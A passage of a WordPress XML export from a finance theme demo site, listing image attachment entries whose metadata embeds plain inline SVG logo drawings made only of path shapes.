		<path class="st0" d="M28.3,8.2l-1.5-0.9c-0.4-0.2-0.9-0.2-1.4,0l-1.6,0.9l-0.1,0.1c-1-0.6-4.9-2.9-4.9-2.9c-0.3-0.2-0.7-0.2-1.1,0    l-4.4,2.5c-0.3,0.2-0.5,0.5-0.5,0.9v0.6l0,4.5c0,0.4,0.2,0.7,0.5,0.9l2.7,1.5l1.8,1c0.3,0.2,0.7,0.2,1.1,0l1.7-1l0,4.9    c-0.1,0-1.6,0.9-1.6,0.9c-0.4,0.2-0.9,0.5-1.4,0.3l-1.6-0.8l0,0l-7.1-4.1c-0.4-0.2-0.7-0.7-0.7-1.2l0-1.7l0-5.3l0-3.1    c0-0.5,0.3-0.9,0.7-1.2l8.7-5c0.4-0.2,0.9-0.2,1.4,0l8.7,5c0.4,0.2,0.7,0.7,0.7,1.2C28.3,7.1,28.3,7.5,28.3,8.2z"></path>
		<path class="st0" d="M20.1,22.2l0,2.8v0.3c0,0.5-0.3,0.9-0.7,1.2L18.4,27l-0.5,0.3l-7.1,4.1c-0.4,0.2-0.9,0.2-1.4,0l-8.7-5    C0.3,26.1,0,25.7,0,25.2v-0.3l0-9.8c0-0.5,0.3-0.9,0.7-1.2L7.6,10v5.2c0,0,0,0.1,0,0.1l-2.4,1.4c-0.3,0.2-0.5,0.5-0.5,0.9l0,4.8    v0.3c0,0.4,0.2,0.7,0.5,0.9l4.4,2.6c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9v-0.6l0,0l0.2,0.1l1.4,0.8    c0.4,0.2,0.9,0.2,1.4,0l0,0l0,0c0.1,0,0.1,0,0.2-0.1L20.1,22.2z"></path>
	</g>
	<g>
		<path class="st0" d="M49.8,23.5c-0.9-0.3-1.6-0.6-2.1-1l0.9-2.1c0.5,0.4,1.1,0.7,1.8,0.9c0.7,0.2,1.4,0.3,2.1,0.3    c0.8,0,1.4-0.1,1.7-0.4c0.4-0.2,0.6-0.5,0.6-0.9c0-0.3-0.1-0.5-0.3-0.7c-0.2-0.2-0.5-0.3-0.9-0.5c-0.3-0.1-0.8-0.2-1.4-0.4    c-0.9-0.2-1.7-0.4-2.2-0.6c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.5-0.6-1.1-0.6-1.9c0-0.7,0.2-1.3,0.6-1.9c0.4-0.6,0.9-1,1.7-1.3    c0.8-0.3,1.7-0.5,2.8-0.5c0.8,0,1.5,0.1,2.2,0.3c0.7,0.2,1.4,0.4,1.9,0.8l-0.9,2.1c-1.1-0.6-2.2-0.9-3.3-0.9    c-0.8,0-1.3,0.1-1.7,0.4c-0.4,0.3-0.6,0.6-0.6,1s0.2,0.7,0.6,0.9c0.4,0.2,1.1,0.4,2,0.6c0.9,0.2,1.7,0.4,2.2,0.6    c0.6,0.2,1.1,0.6,1.5,1c0.4,0.5,0.6,1.1,0.6,1.9c0,0.7-0.2,1.3-0.6,1.9c-0.4,0.6-1,1-1.7,1.3c-0.8,0.3-1.7,0.5-2.8,0.5    C51.6,23.8,50.7,23.7,49.8,23.5z"></path>
		<path class="st0" d="M68.8,21.4v2.2h-9.3v-12h9v2.2h-6.3v2.6h5.6v2.2h-5.6v2.8H68.8z"></path>
		<path class="st0" d="M73.4,23c-1-0.5-1.8-1.3-2.3-2.2c-0.6-0.9-0.8-2-0.8-3.2c0-1.2,0.3-2.2,0.8-3.2c0.6-0.9,1.3-1.7,2.3-2.2    c1-0.5,2.1-0.8,3.4-0.8c1.2,0,2.4,0.3,3.3,0.8c1,0.5,1.8,1.3,2.3,2.2c0.6,0.9,0.9,2,0.9,3.2c0,1.2-0.3,2.2-0.9,3.2    c-0.6,0.9-1.4,1.7-2.3,2.2c-1,0.5-2.1,0.8-3.3,0.8C75.5,23.8,74.4,23.6,73.4,23z M78.7,21c0.6-0.3,1-0.8,1.3-1.4    c0.3-0.6,0.5-1.2,0.5-2c0-0.7-0.2-1.4-0.5-2c-0.3-0.6-0.8-1-1.3-1.4c-0.6-0.3-1.2-0.5-1.9-0.5c-0.7,0-1.3,0.2-1.9,0.5    c-0.6,0.3-1,0.8-1.3,1.4c-0.3,0.6-0.5,1.2-0.5,2c0,0.7,0.2,1.4,0.5,2c0.3,0.6,0.8,1,1.3,1.4c0.6,0.3,1.2,0.5,1.9,0.5    C77.5,21.5,78.1,21.3,78.7,21z"></path>
		<path class="st0" d="M101.1,23.6l0-7.2l-3.5,5.9h-1.2l-3.5-5.8v7h-2.6v-12h2.3l4.5,7.4l4.4-7.4h2.3l0,12H101.1z"></path>
		<path class="st0" d="M106.5,12.7c-0.3-0.3-0.5-0.6-0.5-1.1c0-0.4,0.2-0.8,0.5-1.1c0.3-0.3,0.7-0.4,1.2-0.4c0.5,0,0.9,0.1,1.2,0.4    s0.5,0.6,0.5,1c0,0.4-0.2,0.8-0.5,1.1c-0.3,0.3-0.7,0.4-1.2,0.4C107.2,13.2,106.8,13,106.5,12.7z M106.3,14.4h2.7v9.2h-2.7V14.4z"></path>
		<path class="st0" d="M119.8,15.3c0.7,0.7,1.1,1.7,1.1,3v5.3h-2.7v-4.9c0-0.7-0.2-1.3-0.5-1.6c-0.3-0.4-0.8-0.5-1.4-0.5    c-0.7,0-1.2,0.2-1.6,0.6c-0.4,0.4-0.6,1-0.6,1.9v4.5h-2.7v-9.2h2.5v1.1c0.4-0.4,0.8-0.7,1.3-0.9c0.5-0.2,1.1-0.3,1.7-0.3    C118.2,14.3,119.1,14.7,119.8,15.3z"></path>
		<path class="st0" d="M132.8,11v12.7h-2.5v-1.1c-0.7,0.8-1.6,1.2-2.9,1.2c-0.9,0-1.6-0.2-2.4-0.6c-0.7-0.4-1.3-0.9-1.6-1.7    c-0.4-0.7-0.6-1.5-0.6-2.5c0-0.9,0.2-1.8,0.6-2.5c0.4-0.7,0.9-1.3,1.6-1.7c0.7-0.4,1.5-0.6,2.4-0.6c1.2,0,2.1,0.4,2.8,1.1V11    H132.8z M129.5,20.9c0.4-0.5,0.7-1.1,0.7-1.9c0-0.8-0.2-1.4-0.7-1.9c-0.4-0.5-1-0.7-1.7-0.7c-0.7,0-1.2,0.2-1.7,0.7    c-0.4,0.5-0.7,1.1-0.7,1.9c0,0.8,0.2,1.4,0.7,1.9c0.4,0.5,1,0.7,1.7,0.7C128.5,21.6,129,21.4,129.5,20.9z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>02</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/attachment/02/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/02-2.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>511</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[02]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/02-2.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/02-2.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 131.6 29.8" style="enable-background:new 0 0 131.6 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x32_">
	<g>
		<path class="st0" d="M43.3,8.1h2.8v12.5h-2.8V8.1z"></path>
		<path class="st0" d="M53.1,20.7c-0.7,0-1.4,0-2-0.1s-1.4-0.1-2.1-0.3V8.3c0.6-0.1,1.2-0.2,1.9-0.2c0.7-0.1,1.3-0.1,1.9-0.1    c0.8,0,1.5,0.1,2.2,0.2c0.7,0.1,1.2,0.3,1.7,0.6c0.5,0.3,0.9,0.6,1.1,1.1c0.3,0.5,0.4,1,0.4,1.7c0,1-0.5,1.8-1.4,2.4    c0.8,0.3,1.3,0.7,1.6,1.2c0.3,0.5,0.4,1.1,0.4,1.7c0,1.3-0.5,2.3-1.4,3C56.4,20.4,55,20.7,53.1,20.7z M51.7,13h1.4    c0.9,0,1.5-0.1,1.9-0.3c0.4-0.2,0.6-0.6,0.6-1.1c0-0.5-0.2-0.9-0.6-1.1s-0.9-0.3-1.7-0.3c-0.2,0-0.5,0-0.8,0c-0.3,0-0.5,0-0.7,0    V13z M51.7,15.1v3.2c0.2,0,0.4,0,0.7,0.1c0.2,0,0.5,0,0.8,0c0.8,0,1.5-0.1,2-0.4s0.8-0.7,0.8-1.3c0-0.6-0.2-1-0.6-1.2    c-0.4-0.2-1-0.4-1.9-0.4H51.7z"></path>
		<path class="st0" d="M64.4,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2H72c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H64.4z"></path>
		<path class="st0" d="M84.8,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2h-2.7c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H84.8z"></path>
		<path class="st0" d="M97,15.9c0-0.8,0.1-1.6,0.4-2.2c0.3-0.6,0.6-1.2,1-1.6c0.4-0.4,0.9-0.7,1.4-1c0.5-0.2,1.1-0.3,1.7-0.3    c1.3,0,2.4,0.4,3.2,1.2c0.8,0.8,1.2,2,1.2,3.6c0,0.2,0,0.3,0,0.5c0,0.2,0,0.4,0,0.5h-6.1c0.1,0.6,0.3,1,0.8,1.3s1.1,0.5,1.8,0.5    c0.5,0,1,0,1.4-0.1c0.5-0.1,0.9-0.2,1.2-0.3l0.4,2.2c-0.1,0.1-0.3,0.1-0.6,0.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-0.9,0.1    s-0.7,0.1-1,0.1c-0.9,0-1.6-0.1-2.2-0.4s-1.2-0.6-1.6-1c-0.4-0.4-0.7-1-0.9-1.6C97.1,17.2,97,16.6,97,15.9z M103.3,14.9    c0-0.2-0.1-0.4-0.1-0.7c-0.1-0.2-0.2-0.4-0.3-0.6c-0.1-0.2-0.3-0.3-0.5-0.4c-0.2-0.1-0.5-0.2-0.8-0.2c-0.3,0-0.6,0.1-0.8,0.2    c-0.2,0.1-0.4,0.2-0.5,0.4c-0.1,0.2-0.3,0.4-0.3,0.6c-0.1,0.2-0.1,0.4-0.2,0.7H103.3z"></path>
		<path class="st0" d="M116.4,20.2c-0.2,0.1-0.5,0.1-0.8,0.2c-0.3,0.1-0.6,0.1-1,0.2c-0.3,0-0.7,0.1-1,0.1c-0.4,0-0.7,0-1,0    c-0.8,0-1.5-0.1-2.1-0.3c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.4-0.7-0.9-1-1.5c-0.2-0.6-0.3-1.3-0.3-2c0-0.8,0.1-1.5,0.3-2.1    c0.2-0.6,0.5-1.1,0.8-1.6c0.4-0.4,0.8-0.8,1.3-1c0.5-0.2,1.1-0.3,1.8-0.3c0.4,0,0.7,0,1,0.1c0.3,0.1,0.6,0.2,0.9,0.3V7l2.7-0.4    V20.2z M110.3,15.7c0,0.8,0.2,1.5,0.6,2s0.9,0.8,1.7,0.8c0.2,0,0.5,0,0.7,0c0.2,0,0.4,0,0.5-0.1v-4.9c-0.2-0.1-0.4-0.2-0.7-0.3    c-0.3-0.1-0.5-0.1-0.8-0.1C110.9,13.2,110.3,14,110.3,15.7z"></path>
		<path class="st0" d="M121.8,8.3c0,0.5-0.2,0.9-0.5,1.2s-0.7,0.4-1.1,0.4c-0.4,0-0.8-0.1-1.1-0.4s-0.5-0.7-0.5-1.2s0.2-0.9,0.5-1.2    c0.3-0.3,0.7-0.4,1.1-0.4c0.4,0,0.8,0.1,1.1,0.4C121.6,7.5,121.8,7.9,121.8,8.3z M121.6,20.6h-2.7v-9.5h2.7V20.6z"></path>
		<path class="st0" d="M127.5,10.8c0.8,0,1.5,0.1,2,0.3c0.5,0.2,1,0.4,1.3,0.8c0.3,0.3,0.5,0.7,0.7,1.2c0.1,0.5,0.2,1,0.2,1.6v5.6    c-0.4,0.1-0.9,0.2-1.6,0.3c-0.7,0.1-1.5,0.2-2.5,0.2c-0.6,0-1.2-0.1-1.7-0.2c-0.5-0.1-0.9-0.3-1.3-0.5s-0.6-0.6-0.8-1    c-0.2-0.4-0.3-0.9-0.3-1.5c0-0.6,0.1-1,0.3-1.4c0.2-0.4,0.5-0.7,0.9-0.9c0.4-0.2,0.8-0.4,1.3-0.5c0.5-0.1,1-0.2,1.5-0.2    c0.3,0,0.7,0,0.9,0c0.3,0,0.5,0.1,0.7,0.1v-0.3c0-0.5-0.1-0.8-0.4-1.1c-0.3-0.3-0.8-0.4-1.4-0.4c-0.5,0-0.9,0-1.4,0.1    c-0.4,0.1-0.8,0.2-1.2,0.3l-0.3-2.2c0.2,0,0.4-0.1,0.6-0.2c0.2-0.1,0.5-0.1,0.8-0.1c0.3,0,0.6-0.1,0.9-0.1    C126.9,10.8,127.2,10.8,127.5,10.8z M127.7,18.7c0.3,0,0.5,0,0.8,0s0.4,0,0.6-0.1v-2c-0.1,0-0.3,0-0.5-0.1c-0.2,0-0.4,0-0.6,0    c-0.3,0-0.5,0-0.7,0s-0.4,0.1-0.6,0.2s-0.3,0.2-0.4,0.3c-0.1,0.1-0.1,0.3-0.1,0.5c0,0.4,0.1,0.7,0.4,0.9S127.2,18.7,127.7,18.7z"></path>
	</g>
	<g>
		<g>
			<path class="st0" d="M5.5,6.5V0H4.8C2.2,0,0,2.2,0,4.8v1.7H5.5z"></path>
		</g>
		<g>
			<path class="st0" d="M25.1,8.4h4.8V4.8c0-2.6-2.1-4.8-4.8-4.8V8.4z"></path>
		</g>
		<g>
			<path class="st0" d="M21.6,25.1v4.7H25c2.6,0,4.8-2.1,4.8-4.7H21.6z"></path>
		</g>
		<g>
			<path class="st0" d="M6.7,23.8H0v-1.5h7.4c0.4,0,0.8,0.3,0.8,0.8v6.8h2.2v-9.4H6c-0.4,0-0.8-0.3-0.8-0.8V14     c-0.5-0.3-0.9-0.9-0.9-1.5c0-0.9,0.8-1.7,1.7-1.7c0.9,0,1.7,0.8,1.7,1.7c0,0.7-0.4,1.3-1,1.6V19h4.4c0.4,0,0.8,0.3,0.8,0.8v10.1     h3.4v-3.4c-0.6-0.3-1-0.9-1-1.6c0-0.9,0.8-1.7,1.7-1.7s1.7,0.8,1.7,1.7c0,0.7-0.4,1.2-0.9,1.5v3.4H20v-5.5c0-0.4,0.3-0.8,0.8-0.8     h9v-9.5h-3v4.7c0,0.4-0.3,0.8-0.8,0.8h-5.5c-0.3,0.6-0.9,1-1.6,1c-0.9,0-1.7-0.8-1.7-1.7c0-0.9,0.8-1.7,1.7-1.7     c0.7,0,1.2,0.4,1.5,0.9h4.8v-4.7c0-0.4,0.3-0.8,0.8-0.8h3.7V9.9h-5.5c-0.4,0-0.8-0.3-0.8-0.8V0h-8.2v2.7h5.1     c0.4,0,0.8,0.3,0.8,0.8v5.6c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7c-0.9,0-1.7-0.8-1.7-1.7c0-0.7,0.4-1.2,0.9-1.5V4.2h-5.1     c-0.4,0-0.8-0.3-0.8-0.8V0h-3.7v5.6h3.1c0.4,0,0.8,0.3,0.8,0.8v7c0.6,0.3,1,0.9,1,1.6c0,0.9-0.8,1.7-1.7,1.7     c-0.9,0-1.7-0.8-1.7-1.7c0-0.6,0.4-1.2,0.9-1.5V7.1H9.4C9,7.1,8.6,6.7,8.6,6.3V0H7v7.2C7,7.7,6.7,8,6.3,8H0v17     c0,2.7,2.2,4.8,4.8,4.8h1.9V23.8z"></path>
		</g>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>03</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/attachment/03/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/03-2.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>512</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:18]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:18]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[03]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/03-2.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/03-2.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 141.3 30" style="enable-background:new 0 0 141.3 30;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x33_">
	<g>
		<path class="st0" d="M63.8,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5c-0.4,0.4-0.9,0.8-1.5,1c-0.6,0.2-1.2,0.4-1.9,0.4    c-0.7,0-1.4-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1.1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,1.9-0.4c0.8,0,1.5,0.2,2.2,0.5c0.7,0.3,1.3,0.8,1.7,1.3l-1.6,1.4    c-0.3-0.4-0.7-0.7-1-0.9s-0.8-0.3-1.3-0.3c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6s-0.4,0.5-0.5,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.8,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9s0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1.1,0.2    c0.5,0,1-0.1,1.4-0.4c0.4-0.3,0.7-0.6,0.8-1.1h-2.5v-2h5V17.8z"></path>
		<path class="st0" d="M65,22.5v-9.3h4.8c0.5,0,0.9,0.1,1.3,0.2c0.4,0.1,0.7,0.4,1,0.6c0.3,0.3,0.5,0.6,0.7,0.9    c0.2,0.4,0.2,0.8,0.2,1.2c0,0.6-0.2,1.1-0.5,1.6c-0.3,0.5-0.7,0.8-1.3,1.1l2,3.7h-2.6L69,19.1h-1.7v3.4H65z M69.6,15.1h-2.3v2.1    h2.3c0.4,0,0.6-0.1,0.9-0.3c0.2-0.2,0.3-0.4,0.3-0.8c0-0.3-0.1-0.6-0.3-0.8C70.2,15.2,69.9,15.1,69.6,15.1z"></path>
		<path class="st0" d="M74.2,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H74.2z"></path>
		<path class="st0" d="M83,22.5v-9.3h7.3v2h-5.1v1.7h3.3v1.9h-3.3v1.8h5.1v2H83z"></path>
		<path class="st0" d="M91.7,13.2h2.2l4.2,5.4v-5.4h2.2v9.3h-2l-4.4-5.6v5.6h-2.2V13.2z"></path>
		<path class="st0" d="M104.4,22.5v-9.3h2.3v3.6h3.8v-3.6h2.3v9.3h-2.3v-3.6h-3.8v3.6H104.4z"></path>
		<path class="st0" d="M123.9,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.3,0.6-0.6,1.1-1.1,1.5c-0.4,0.4-1,0.8-1.6,1c-0.6,0.2-1.3,0.4-2,0.4    c-0.7,0-1.3-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,2-0.4c0.7,0,1.3,0.1,2,0.4c0.6,0.2,1.1,0.6,1.6,1    c0.4,0.4,0.8,0.9,1.1,1.5C123.8,16.5,123.9,17.2,123.9,17.8z M121.6,17.8c0-0.4-0.1-0.7-0.2-1.1c-0.1-0.3-0.3-0.6-0.6-0.9    s-0.5-0.4-0.8-0.6c-0.3-0.1-0.7-0.2-1-0.2c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6c-0.2,0.2-0.4,0.5-0.6,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.7,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9c0.2,0.2,0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1,0.2    c0.4,0,0.7-0.1,1-0.2c0.3-0.1,0.6-0.3,0.8-0.6c0.2-0.2,0.4-0.5,0.6-0.9C121.5,18.6,121.6,18.2,121.6,17.8z"></path>
		<path class="st0" d="M124.4,21.1l1.3-1.7c0.6,0.5,1.1,0.8,1.6,1c0.5,0.2,1,0.3,1.5,0.3c0.5,0,0.9-0.1,1.2-0.2    c0.3-0.2,0.4-0.4,0.4-0.7c0-0.3-0.1-0.5-0.3-0.6c-0.2-0.1-0.5-0.3-1-0.3l-2-0.4c-0.8-0.1-1.3-0.4-1.7-0.9c-0.4-0.4-0.6-1-0.6-1.7    c0-0.9,0.3-1.6,1-2.1c0.7-0.5,1.6-0.8,2.8-0.8c0.7,0,1.4,0.1,2.1,0.4c0.7,0.2,1.3,0.6,1.8,1l-1.2,1.7c-0.5-0.4-1-0.7-1.4-0.8    c-0.5-0.2-0.9-0.3-1.4-0.3c-0.5,0-0.8,0.1-1.1,0.2c-0.3,0.1-0.4,0.3-0.4,0.6c0,0.2,0.1,0.4,0.3,0.5c0.2,0.1,0.5,0.2,0.8,0.3    l1.9,0.3c0.9,0.1,1.6,0.4,2,0.9c0.5,0.5,0.7,1,0.7,1.8c0,0.9-0.4,1.7-1.1,2.2c-0.7,0.5-1.7,0.8-3,0.8c-0.7,0-1.5-0.1-2.2-0.4    C125.6,21.9,125,21.6,124.4,21.1z"></path>
		<path class="st0" d="M132.9,15.2v-2h8.4v2h-3v7.3H136v-7.3H132.9z"></path>
	</g>
	<path class="st0" d="M25.3,19.9c2.1,0,3.9-1.7,3.9-3.9s-1.7-3.9-3.9-3.9s-3.9,1.7-3.9,3.9S23.2,19.9,25.3,19.9z M13.9,23.1   c-1.4,0-2.5,1.1-2.5,2.5c0,1.4,1.1,2.5,2.5,2.5c1.4,0,2.5-1.1,2.5-2.5C16.5,24.2,15.3,23.1,13.9,23.1z M33.5,25.3   c-1,0-1.8,0.8-1.8,1.8s0.8,1.8,1.8,1.8c1,0,1.8-0.8,1.8-1.8S34.5,25.3,33.5,25.3z M43.8,16.3c-0.2-2.9-2.6-5.3-5.5-5.5   c-2.7-0.2-5,1.4-6,3.6l0,0c0,0,0,0,0,0l-1.7,4.1c-0.8,2-2.5,3.5-4.5,4.2h0c-1.4,0.5-3,0.1-4.1-0.9c-0.4-0.4-0.8-0.8-0.8-0.8   c-0.9-0.8-1.5-1.9-1.7-3.1c-0.1-0.4-0.1-0.8-0.1-1.2l0.2-4.5l0.1-2.1l0,0c0-0.1,0-0.1,0-0.2c0-5.7-4.8-10.2-10.5-9.8   C4.3,0.4,0.4,4.3,0,9.1C0,10,0,10.8,0.2,11.6c0.8,4.6,4.8,8,9.7,8c0.2,0,4.3,0.3,5.9,1.2l1.1,0.6c1.1,0.6,1.9,1.6,2.4,2.7l1.4,3.4   l0,0c0.4,1.4,1.6,2.5,3.2,2.5c1,0,2-0.5,2.6-1.2c0.5-0.6,4.1-4.2,4.1-4.2c0.8-0.9,2-1.4,3.2-1.5l4.8-0.3c2.5-0.2,4.5-1.9,5.3-4.2   c0.2-0.6,0.3-1.2,0.3-1.8C43.8,16.6,43.8,16.4,43.8,16.3z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/attachment/04/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04-2.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>513</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04-2.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/04-2.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
